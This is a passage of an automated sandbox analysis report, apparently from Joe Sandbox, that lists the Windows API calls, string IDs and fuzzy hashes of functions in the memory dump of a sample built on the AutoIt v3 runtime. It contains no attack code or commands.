                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA9E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ECB6F4
                                          • RegOpenKeyExW.ADVAPI32 ref: 00ECB772
                                          • RegDeleteValueW.ADVAPI32 ref: 00ECB80A
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECB87E
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECB89C
                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00ECB8F2
                                          • GetProcAddress.KERNEL32 ref: 00ECB904
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ECB922
                                          • FreeLibrary.KERNEL32 ref: 00ECB983
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECB994
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 146587525-4033151799
                                          • Opcode ID: 28e69333f2d53bd837c72ace5a45f4882afabce54af65d697c8a0850858645e5
                                          • Instruction ID: 0b2459d7dacb68c62ad91c213a1d5bd11992714c61284e67eb92c8903ae73645
                                          • Opcode Fuzzy Hash: 28e69333f2d53bd837c72ace5a45f4882afabce54af65d697c8a0850858645e5
                                          • Instruction Fuzzy Hash: 3CC1B131205201AFD714DF14D595F2ABBE5FF84308F24955CF49AAB2A2CB36EC46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: fe9b6c6ff9113daeaa080e88f8798a3b626b0c88db67035a8c17f4a93a723284
                                          • Instruction ID: 51d1817580d60614511228ac0848bcc9463cab7432c81a95ad9aa78b7576db1e
                                          • Opcode Fuzzy Hash: fe9b6c6ff9113daeaa080e88f8798a3b626b0c88db67035a8c17f4a93a723284
                                          • Instruction Fuzzy Hash: 1561D275D01219AFCB04CFA4D985EAEBBF5FF48310F20852AE955B7250D771A941CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00EA369C
                                          • _wcslen.LIBCMT ref: 00EA36A7
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EA3797
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00EA380C
                                          • GetDlgCtrlID.USER32 ref: 00EA385D
                                          • GetWindowRect.USER32(?,?), ref: 00EA3882
                                          • GetParent.USER32(?), ref: 00EA38A0
                                          • ScreenToClient.USER32(00000000), ref: 00EA38A7
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00EA3921
                                          • GetWindowTextW.USER32 ref: 00EA395D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                          • String ID: %s%u
                                          • API String ID: 4010501982-679674701
                                          • Opcode ID: a13f3e276bff7b69fde4edbdbabc7cca029ef7357e0c7205c2dfe6d11b808528
                                          • Instruction ID: a586d54842d3cf8df8c5e428e5848ce94dc786d5f8a9064abb33481ad675f98f
                                          • Opcode Fuzzy Hash: a13f3e276bff7b69fde4edbdbabc7cca029ef7357e0c7205c2dfe6d11b808528
                                          • Instruction Fuzzy Hash: D391D471204606AFD708DF34D885BABB7E8FF49344F105619F999EA190DB30FA45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00EA4994
                                          • GetWindowTextW.USER32 ref: 00EA49DA
                                          • _wcslen.LIBCMT ref: 00EA49EB
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00EA49F7
                                          • _wcsstr.LIBVCRUNTIME ref: 00EA4A2C
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00EA4A64
                                          • GetWindowTextW.USER32 ref: 00EA4A9D
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00EA4AE6
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00EA4B20
                                          • GetWindowRect.USER32(?,?), ref: 00EA4B8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                          • String ID: ThumbnailClass
                                          • API String ID: 1311036022-1241985126
                                          • Opcode ID: e3fc6295e9d86531c58c6f2f7b4109f9c5b69ffa8080b16b6aa9fc6e41a1f56f
                                          • Instruction ID: fcc3b6d302abac2956813e8fa843f1b353f47437fae51995ab024a7468d24fb5
                                          • Opcode Fuzzy Hash: e3fc6295e9d86531c58c6f2f7b4109f9c5b69ffa8080b16b6aa9fc6e41a1f56f
                                          • Instruction Fuzzy Hash: 8A91C1B10042059FDB04CF14D981BAAB7E8EF89758F04646AFD85AE0D6DB70FD45CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • PostMessageW.USER32 ref: 00ED8D5A
                                          • GetFocus.USER32 ref: 00ED8D6A
                                          • GetDlgCtrlID.USER32 ref: 00ED8D75
                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00ED8E1D
                                          • GetMenuItemInfoW.USER32 ref: 00ED8ECF
                                          • GetMenuItemCount.USER32(?), ref: 00ED8EEC
                                          • GetMenuItemID.USER32(?,00000000), ref: 00ED8EFC
                                          • GetMenuItemInfoW.USER32 ref: 00ED8F2E
                                          • GetMenuItemInfoW.USER32 ref: 00ED8F70
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED8FA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                          • String ID: 0
                                          • API String ID: 1026556194-4108050209
                                          • Opcode ID: eab0841a4aabed14ec1376dbac5dfb156b4641bee7e775779b0774e390a09385
                                          • Instruction ID: 095d54bbc1780bcc5fad21463019d54299782f5474ee3c4b90586476e486beba
                                          • Opcode Fuzzy Hash: eab0841a4aabed14ec1376dbac5dfb156b4641bee7e775779b0774e390a09385
                                          • Instruction Fuzzy Hash: 4181BE716043059FD720CF14DE84AAB7BE9FB88758F142A1EF994A7391DB30D906CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00ECCC64
                                          • RegOpenKeyExW.ADVAPI32 ref: 00ECCC8D
                                          • FreeLibrary.KERNEL32 ref: 00ECCD48
                                            • Part of subcall function 00ECCC34: RegCloseKey.ADVAPI32(?), ref: 00ECCCAA
                                            • Part of subcall function 00ECCC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00ECCCBD
                                            • Part of subcall function 00ECCC34: GetProcAddress.KERNEL32 ref: 00ECCCCF
                                            • Part of subcall function 00ECCC34: FreeLibrary.KERNEL32 ref: 00ECCD05
                                            • Part of subcall function 00ECCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00ECCD28
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ECCCF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2734957052-4033151799
                                          • Opcode ID: 47313d79c2dce7d96feeb668c97ac6978b1055418bb5b8cca99fdbeff1f85811
                                          • Instruction ID: 142fb7362b4672e9a8a3cbdb9b361fa93c6b0d7837166fd4f75684416b5c66c0
                                          • Opcode Fuzzy Hash: 47313d79c2dce7d96feeb668c97ac6978b1055418bb5b8cca99fdbeff1f85811
                                          • Instruction Fuzzy Hash: 6D318671902129BFDB209B51DD88EFFBF7CEF15744F204169E90AF2140D7349A46DAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • timeGetTime.WINMM ref: 00EAE6B4
                                            • Part of subcall function 00E5E551: timeGetTime.WINMM ref: 00E5E555
                                          • Sleep.KERNEL32(0000000A), ref: 00EAE6E1
                                          • EnumThreadWindows.USER32 ref: 00EAE705
                                          • FindWindowExW.USER32 ref: 00EAE727
                                          • SetActiveWindow.USER32 ref: 00EAE746
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EAE754
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EAE773
                                          • Sleep.KERNEL32(000000FA), ref: 00EAE77E
                                          • IsWindow.USER32 ref: 00EAE78A
                                          • EndDialog.USER32 ref: 00EAE79B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: d86733227b8e44673365a9e160c79fa6a5c5e50dbd384d7f03bb3930bcffefa0
                                          • Instruction ID: 24c0668b0b7fa3e24d34d3aed7421e884e76efb6cabdda9182de1c5ac10258fa
                                          • Opcode Fuzzy Hash: d86733227b8e44673365a9e160c79fa6a5c5e50dbd384d7f03bb3930bcffefa0
                                          • Instruction Fuzzy Hash: 9B21C670301209AFEB005F71FC89B653BA9F79A788F216426F511B62E1DB71BC14EA25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EAEA5D
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EAEA73
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAEA84
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EAEA96
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EAEAA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: SendString$_wcslen
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2420728520-1007645807
                                          • Opcode ID: aa097e1a97246b1e42a448f98b2e373570a60edde66379bb9de129c40cc77e9e
                                          • Instruction ID: 25010fb5920d0fcaa49ee53d916b4caf623c0e37ea5100faf51f384cdc67a17e
                                          • Opcode Fuzzy Hash: aa097e1a97246b1e42a448f98b2e373570a60edde66379bb9de129c40cc77e9e
                                          • Instruction Fuzzy Hash: BC11A331A902597DE720A7A1EC4AEFF6BBCEBD6B04F001429B411F60D1EE705914D5B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSysColorBrush.USER32 ref: 00E42D07
                                          • RegisterClassExW.USER32(00000030), ref: 00E42D31
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E42D42
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E42D5F
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E42D6F
                                          • LoadIconW.USER32 ref: 00E42D85
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E42D94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: e3eca67da570ad60c6a6598418e2ae9f57f3b6c9952d7a7486d496ab682d46b0
                                          • Instruction ID: 9e39ca80f39dd0b3fcf4dccf48b19d012682b3a6d84ee8955da06bb7fa249718
                                          • Opcode Fuzzy Hash: e3eca67da570ad60c6a6598418e2ae9f57f3b6c9952d7a7486d496ab682d46b0
                                          • Instruction Fuzzy Hash: C221B2B590221DAFDB00DFA5E849BDDBBB8FB08741F10811BE621B62A0D7B14544DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E58F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00E58FC5
                                          • DestroyWindow.USER32 ref: 00E58C81
                                          • KillTimer.USER32 ref: 00E58D1B
                                          • DestroyAcceleratorTable.USER32 ref: 00E96973
                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E58BBA,00000000,?), ref: 00E969A1
                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E58BBA,00000000,?), ref: 00E969B8
                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E58BBA,00000000), ref: 00E969D4
                                          • DeleteObject.GDI32(00000000), ref: 00E969E6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 2ef4d4add92141dbb38d121a37643de85c4b709a1760aea4edbcea70831fff30
                                          • Instruction ID: bcb999d4409d5c7823d8e7242d8a5f359d4f96cbb37867e3edd021f8c2a65c13
                                          • Opcode Fuzzy Hash: 2ef4d4add92141dbb38d121a37643de85c4b709a1760aea4edbcea70831fff30
                                          • Instruction Fuzzy Hash: B661BD30102605DFDF219F25DA48BA9B7F1FB4036AF11A91EE542BA560CB71AC88DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59944: GetWindowLongW.USER32(?,000000EB), ref: 00E59952
                                          • GetSysColor.USER32 ref: 00E59862
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 20dd3a74a76edf4e24e551a7a2285e988b729d5ee1c6cffbe60c678edabb414b
                                          • Instruction ID: 95a5e341e01231a7c0c0d44c2401a66ab57d146b92bc0b00bbafa5b56988d5d6
                                          • Opcode Fuzzy Hash: 20dd3a74a76edf4e24e551a7a2285e988b729d5ee1c6cffbe60c678edabb414b
                                          • Instruction Fuzzy Hash: 1B41B131105610DFDF245F39AC84BF93BA5EB06376F245A06FAA2AB1E2C7309C49DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32 ref: 00EA9717
                                          • LoadStringW.USER32(00000000,?,00E8F7F8,00000001), ref: 00EA9720
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • GetModuleHandleW.KERNEL32 ref: 00EA9742
                                          • LoadStringW.USER32(00000000,?,00E8F7F8,00000001), ref: 00EA9745
                                          • MessageBoxW.USER32 ref: 00EA9866
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 747408836-2268648507
                                          • Opcode ID: 17db5233b94d35bf7f801d70fae7e851b2159bdddc8632d7e5605ef02f497b40
                                          • Instruction ID: 9d7710d0b9c4e36a0b0cdfe798123ed66401c4f342068e0054a7cc9f7d834afb
                                          • Opcode Fuzzy Hash: 17db5233b94d35bf7f801d70fae7e851b2159bdddc8632d7e5605ef02f497b40
                                          • Instruction Fuzzy Hash: 98413E72900219AADF04EFE0ED86DEEB7B8AF59340F601065F60576092EB356F48DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EA07A2
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EA07BE
                                          • RegOpenKeyExW.ADVAPI32 ref: 00EA07DA
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00EA0804
                                          • CLSIDFromString.OLE32(?,000001FE), ref: 00EA082C
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA0837
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA083C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 323675364-22481851
                                          • Opcode ID: 1fbdc5a30241af7cdc291507b4a278bedba895f3ec3e06162eab853bb19ad72f
                                          • Instruction ID: 756f7f10579faed60af4d3b4397abe69d804afd61b8f6567174477b81f365f65
                                          • Opcode Fuzzy Hash: 1fbdc5a30241af7cdc291507b4a278bedba895f3ec3e06162eab853bb19ad72f
                                          • Instruction Fuzzy Hash: C2411A72C00129AFDF15EBA4EC858EEB7B8FF48754B145125E901B71A1DB30AD04CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00ED5504
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED5515
                                          • CharNextW.USER32(00000158), ref: 00ED5544
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00ED5585
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00ED559B
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED55AC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$CharNext
                                          • String ID:
                                          • API String ID: 1350042424-0
                                          • Opcode ID: 928830bf6e96702ab88693edbb37c7fe01a9bfa06dff8f4634e7d946613f39a6
                                          • Instruction ID: b36c146dc1d689201712b305ea480b974bdf0ce6650046c1cc994af990970506
                                          • Opcode Fuzzy Hash: 928830bf6e96702ab88693edbb37c7fe01a9bfa06dff8f4634e7d946613f39a6
                                          • Instruction Fuzzy Hash: 39618D32901609EFDB108F55DC849FE7BB9EB05764F10514BF935BA390D7708A82DB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00EC05BC
                                          • inet_addr.WSOCK32(?), ref: 00EC061C
                                          • gethostbyname.WSOCK32(?), ref: 00EC0628
                                          • IcmpCreateFile.IPHLPAPI ref: 00EC0636
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC06C6
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC06E5
                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00EC07B9
                                          • WSACleanup.WSOCK32 ref: 00EC07BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
